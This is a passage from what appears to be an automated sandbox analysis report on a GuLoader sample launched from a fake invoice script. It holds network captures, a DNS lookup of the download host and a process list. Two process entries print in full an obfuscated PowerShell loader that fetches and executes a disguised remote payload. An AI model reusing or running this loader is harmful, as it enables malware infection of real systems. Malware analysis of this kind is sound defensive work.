                                  Apr 19, 2024 18:16:01.379859924 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379878998 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379899025 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379919052 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379936934 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379956007 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379977942 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379998922 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380019903 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380036116 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380059958 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380075932 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380125999 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380131960 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380168915 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380196095 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380207062 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380224943 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380249977 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380270004 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380287886 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380300045 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380327940 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380338907 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380367994 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380378962 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380405903 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380424023 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380450010 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380462885 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380494118 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380508900 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380533934 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380559921 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380573034 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380585909 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380614042 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380626917 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380656958 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.380678892 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.380717993 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.888097048 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.888190985 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.888201952 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.888269901 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:05.865170956 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:05.865314960 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:17:41.906707048 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:17:43.163722992 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:17:45.663666964 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:17:50.647950888 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:18:00.616799116 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:18:20.554255962 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:19:00.431574106 CEST4973080192.168.2.4216.10.249.248
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 18:15:57.559829950 CEST | 52511 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2024 18:15:57.702763081 CEST | 53 | 52511 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 19, 2024 18:15:57.559829950 CEST | 192.168.2.4 | 1.1.1.1 | 0xc31a | Standard query (0) | originalconceptsinc.ru.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 19, 2024 18:15:57.702763081 CEST | 1.1.1.1 | 192.168.2.4 | 0xc31a | No error (0) | originalconceptsinc.ru.com |  | 216.10.249.248 | A (IP address) | IN (0x0001) | false
                                  • originalconceptsinc.ru.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 216.10.249.248 | 80 | 7732 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 18:15:58.216409922 CEST | 193 | OUT | GET /asdt/Kardinaliteter.pfb HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: originalconceptsinc.ru.com
Connection: Keep-Alive
Apr 19, 2024 18:15:58.826647043 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Fri, 19 Apr 2024 16:15:57 GMT
Server: Apache
Last-Modified: Thu, 18 Apr 2024 10:24:26 GMT
Accept-Ranges: bytes
Content-Length: 435220
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-font-type1
                                  Apr 19, 2024 18:15:58.827029943 CEST1289INData Raw: 35 44 65 54 78 38 67 4b 63 31 4b 51 46 41 39 55 34 61 74 4d 39 53 56 30 38 50 41 38 76 56 4b 58 57 75 46 75 55 42 4a 64 72 6d 6b 41 66 32 76 44 32 6f 48 31 67 75 61 64 6f 6a 42 32 6b 61 4a 33 43 4a 58 74 6d 6d 58 64 72 6a 55 50 63 51 44 31 4d 49
                                  Data Ascii: 5DeTx8gKc1KQFA9U4atM9SV08PA8vVKXWuFuUBJdrmkAf2vD2oH1guadojB2kaJ3CJXtmmXdrjUPcQD1MINb0giQ8ZQ94qwWTGElAcuDfkqGscAfZZceS/pN7A8MK3LroPwmoUcwjIL9JjCrM0S1ADSSzL2rWLZo/gp+V/43kTsNAjQEdGWVHURXAJhaf3JpcootGlIusu2CNKN+YBPV2k44n/QUjDBaJqTXLTlBA8+PfJ0qHWS
                                  Apr 19, 2024 18:15:59.335171938 CEST1289INData Raw: 45 35 7a 4d 4d 49 2f 2f 30 33 71 59 56 78 52 63 55 75 44 37 68 69 4e 75 34 2f 6e 4e 70 52 47 4a 69 47 6e 4b 51 59 35 78 6e 62 33 6a 56 52 48 56 68 57 7a 5a 2f 4c 6e 79 57 65 59 6c 68 52 42 54 67 4b 74 61 72 4c 6e 34 47 77 54 2f 70 5a 39 5a 35 63
                                  Data Ascii: E5zMMI//03qYVxRcUuD7hiNu4/nNpRGJiGnKQY5xnb3jVRHVhWzZ/LnyWeYlhRBTgKtarLn4GwT/pZ9Z5cv1uYaeCYB7hpkRg9Pj94st6kNCHH/nN9ktdfB4d890TS90oPap1BlnF2uEfC35zcIkT59yd2oJ55vsoMTH6rVMFqLGQCiFxREthyxDfpx2UJYsv6iOogs3wcMApGSvPz2PprvkOpHkHamIfbN4FICxxTDlhzH+O+k



                                  Target ID:0
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf"
                                  Imagebase:0x7ff7face0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\PING.EXE
                                  Wow64 process (32bit):false
                                  Commandline:ping 127.0.0.1 -n 1
                                  Imagebase:0x7ff74f6d0000
                                  File size:22'528 bytes
                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:2
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\PING.EXE
                                  Wow64 process (32bit):false
                                  Commandline:ping %.%.%.%
                                  Imagebase:0x7ff74f6d0000
                                  File size:22'528 bytes
                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:4
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /c dir
                                  Imagebase:0x7ff7004c0000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:7
                                  Start time:18:15:54
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. 
GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVandcrM,stinLoga,ecab zs.play1Dicye0Straf1T,ely. 
SprtH.eisme Encya Defrd KnoceGelser DitesDrift[Lavri$ OptoP siphrRivineBjrg,sPreobs Poche BererUartie.nnovn Apatd For.eSkra sL.eng]Ambpi=Chron$TrailP GgehalufthvOv,rriJestsoStibbuG ovdrUnwor ');$Premanufacturer=Fremtidsmuligheders 'De ilR.iniaoBoycot S lea Anvet FodgiHenfroBrotanBankfsBrancpMetatuPseudmTa,kbpKryp,eSterrrselvbnDonkreRo,ies Rsen1Besk,0Rakke1 ocr .PolemDBethuoReinhw PassnSoutalByggeo He aaPe.tadTeknoF ,kspiToquel.pporeBelli( Sa.w$UdmaaHH.shiuUnde sPermutUds,uaHj mmnEgenkkM,gneeMisdasgenia,Sadel$De,enSBambieB virmDiveri.anglhoffraySce,ep.verdeAdan,rTropibsubjao Kal.lFiguriSubtrcDingeaOutd lopdra1scaph6,atac3Ageis),outh ';$Premanufacturer=$Maurerne[1]+$Premanufacturer;$Semihyperbolical163=$Maurerne[0];Udslyngende (Fremtidsmuligheders ' allo$BlesugfaitolMel.toBrandbduckwaOut ol Figu:Par pDSarcoe FyrfsSpredt M.lar ,ombu OksekBrobatr,ndviCyke.o In,enSe,ioeEnc mn ulle=H tel(An.sbTbr,dsehypobsDihy.tLep.d-R cklP Revia ChedtBor.bhMe,sl foref$ChadlSErythe Bnn.mpathwiTopbehOver,yFeltspHl,seeOutlerSvigtb D.feoPa.iflCointiCystoc roscaSul hlPerpl1Richl6 budg3Fe.ls)stabi ');while (!$Destruktionen) {Udslyngende (Fremtidsmuligheders 'Tuber$ShockgPalaelUsdelohomopbheadsasluiclProgr:VialfCStjfloPairid anhaaMlketmHyperi luttnDanefe,lhal=Bridg$ Blo,to,jekrAkselu T,reeL.ref ') ;Udslyngende $Premanufacturer;Udslyngende (Fremtidsmuligheders 'T.ngsS Nau t.isemaStudirDe,ontraits-BrnabSFissilVestueS,ppeefremsp Schl Vedhf4Finge ');Udslyngende (Fremtidsmuligheders 'Biern$ Av rgFo,fllS.lito.ejfnbTidlsaC,lyclLow.i:UlejlDCowineHe,ipsKenyatFricarUdstyuSelenkBen htFelloiVarieofragan InfieI adenEr at=F,tto(par,rTFunereSemansSpildt.nwhe- E.hePAn.elaB.ugetAtomkhAkros B.kss$ReaveSS perePyro mDevili parth outcyFordrpGlde,eEuplar DictbMullioScrawlSetaeiTipspcGaitaaSejrsl Bhoo1Larva6Udty 3K,rke)Un,ic ') ;Udslyngende (Fremtidsmuligheders 'Bibli$Mystig TroelOvermoContebPara,aKyllilKunst:Objeco,resuuTrkketUlcers NondcKorpuo arkalRyggedOprin=Kosme$Homilg magllKnalloM,ldvbTicklaDesinlBollo:Cen rD 
temam.ydrepprcednBla,ei.oodrnBnne gLensbeFor.rn,isti+Sn,se+ ,pil%unref$Cha nCFiskehOxidia oolorBorgmmGenereQuaveuGudr s Abone.phanrSortbnnonsaeP stdsSk.lp. ForlcCaccio.iorduskokrnReakttKauti ') ;$Hustankes=$Charmeusernes[$outscold];}Udslyngende (Fremtidsmuligheders ' Sne.$Tidssgpr,sslUprooo Warsb ChryaBenzil.reak:Sku dFPlantoTeo orKont.e ,lats Biedt Unturrundpi Tys,e Ei,esBrede Ar.e=Paleo LabiGLumskeXylottPrste- InkbCI.teropraxinDipletLe.ite olomnDefintS,vog Timin$EnsnaSSkovseafholmvrdifiCarabhSkramyDkninp SankeH.perrDuplibFirmiohusetlAfte,i Lenac HymnaReslal duca1Soci.6Pensi3 rick ');Udslyngende (Fremtidsmuligheders 'Omin.$Enkelg MaxilSvieroskru,b Unema SupelU ern:Bat.eSCoolheSlebenDelphiNonquoNormarO erssKigsst JenhiA armp.nirte DiscnUnde,d Mi.tiBl,dea.akobtDe.issF ber Neel= elat Vmmel[ PostSOveriyP stesCh yetOsteaeDenebm ufte.OverpCDomm,oStamhnVelsovRefereAl,alrArtsmt Kond]Hoven:Comme:RecycFTriolrNonscoTheramEska.Bsk tta H ggs It leIn.om6 Xan,4OpdyrSSoldatPleb.rChantiklebinBesvagFo th(Meane$ForlgFSlabboactivrEneceeFor,isAm.ritEgoisrJulefi SlideNglevsTr ma)Br.ge ');Udslyngende (Fremtidsmuligheders 'inds.$,angsgMammal Lix,oEffuvbRumbaaSammelHvo.m: ,dstZ GastaAvestnStaaltLursaeJazz wIndkao.ycopoPinkid,evis dipl =Detai Kron[OdontSStrany frousCynodt Po.lekosmomRatsb.Tang TM.coleFolloxBe.latVaads.GarreESteamn AfstcS.smaoHemisdBivari ,vernPosttgCivil]Semiv:Sulf,:KalkbA FadeSVe,liC Lse,I KollI ref. 
DdsdGA tioeOver,tPaadmSHyatttM.norrC arai For,nFordeg ooth( bind$ HandS dsmye Shadn UturiLore,oSa.emrAkku.sHundrtTige ipoulapinduke FalbnAfsted ,entiRockfaGtepatBadgesSkude)Diape ');Udslyngende (Fremtidsmuligheders ' Pati$DetaigLyspalKo.kuoBoernbDisruaHattelcassy:SlageG TataeSemislUniveaCholotSighli,ndhfn oseiSi,elzRinediEquicnMe.iagPreun1.yvaa9Apoac2Proce=Bedrv$En.uiZBlomsaBigonnAftagtU,threJaevnwEnarboDe,onoPresedBozin.Derrys Ugesu SidebFiskes R.dit Tegar FamiiTsurinTll.rg Albu(Korne2burea9Vascu5Hensi9Tyskl8 Frit6Vaade,Heyru3 Pudd0 re.r4Dakot2Gautp8Go,mo)In,ei ');Udslyngende $Gelatinizing192;"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  Target ID:8
                                  Start time:18:15:54
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:9
                                  Start time:18:15:56
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
                                  Imagebase:0x7ff7004c0000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:18:16:05
                                  Start date:19/04/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. 
GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVandcrM,stinLoga,ecab zs.play1Dicye0Straf1T,ely. 
SprtH.eisme Encya Defrd KnoceGelser DitesDrift[Lavri$ OptoP siphrRivineBjrg,sPreobs Poche BererUartie.nnovn Apatd For.eSkra sL.eng]Ambpi=Chron$TrailP GgehalufthvOv,rriJestsoStibbuG ovdrUnwor ');$Premanufacturer=Fremtidsmuligheders 'De ilR.iniaoBoycot S lea Anvet FodgiHenfroBrotanBankfsBrancpMetatuPseudmTa,kbpKryp,eSterrrselvbnDonkreRo,ies Rsen1Besk,0Rakke1 ocr .PolemDBethuoReinhw PassnSoutalByggeo He aaPe.tadTeknoF ,kspiToquel.pporeBelli( Sa.w$UdmaaHH.shiuUnde sPermutUds,uaHj mmnEgenkkM,gneeMisdasgenia,Sadel$De,enSBambieB virmDiveri.anglhoffraySce,ep.verdeAdan,rTropibsubjao Kal.lFiguriSubtrcDingeaOutd lopdra1scaph6,atac3Ageis),outh ';$Premanufacturer=$Maurerne[1]+$Premanufacturer;$Semihyperbolical163=$Maurerne[0];Udslyngende (Fremtidsmuligheders ' allo$BlesugfaitolMel.toBrandbduckwaOut ol Figu:Par pDSarcoe FyrfsSpredt M.lar ,ombu OksekBrobatr,ndviCyke.o In,enSe,ioeEnc mn ulle=H tel(An.sbTbr,dsehypobsDihy.tLep.d-R cklP Revia ChedtBor.bhMe,sl foref$ChadlSErythe Bnn.mpathwiTopbehOver,yFeltspHl,seeOutlerSvigtb D.feoPa.iflCointiCystoc roscaSul hlPerpl1Richl6 budg3Fe.ls)stabi ');while (!$Destruktionen) {Udslyngende (Fremtidsmuligheders 'Tuber$ShockgPalaelUsdelohomopbheadsasluiclProgr:VialfCStjfloPairid anhaaMlketmHyperi luttnDanefe,lhal=Bridg$ Blo,to,jekrAkselu T,reeL.ref ') ;Udslyngende $Premanufacturer;Udslyngende (Fremtidsmuligheders 'T.ngsS Nau t.isemaStudirDe,ontraits-BrnabSFissilVestueS,ppeefremsp Schl Vedhf4Finge ');Udslyngende (Fremtidsmuligheders 'Biern$ Av rgFo,fllS.lito.ejfnbTidlsaC,lyclLow.i:UlejlDCowineHe,ipsKenyatFricarUdstyuSelenkBen htFelloiVarieofragan InfieI adenEr at=F,tto(par,rTFunereSemansSpildt.nwhe- E.hePAn.elaB.ugetAtomkhAkros B.kss$ReaveSS perePyro mDevili parth outcyFordrpGlde,eEuplar DictbMullioScrawlSetaeiTipspcGaitaaSejrsl Bhoo1Larva6Udty 3K,rke)Un,ic ') ;Udslyngende (Fremtidsmuligheders 'Bibli$Mystig TroelOvermoContebPara,aKyllilKunst:Objeco,resuuTrkketUlcers NondcKorpuo arkalRyggedOprin=Kosme$Homilg magllKnalloM,ldvbTicklaDesinlBollo:Cen rD 
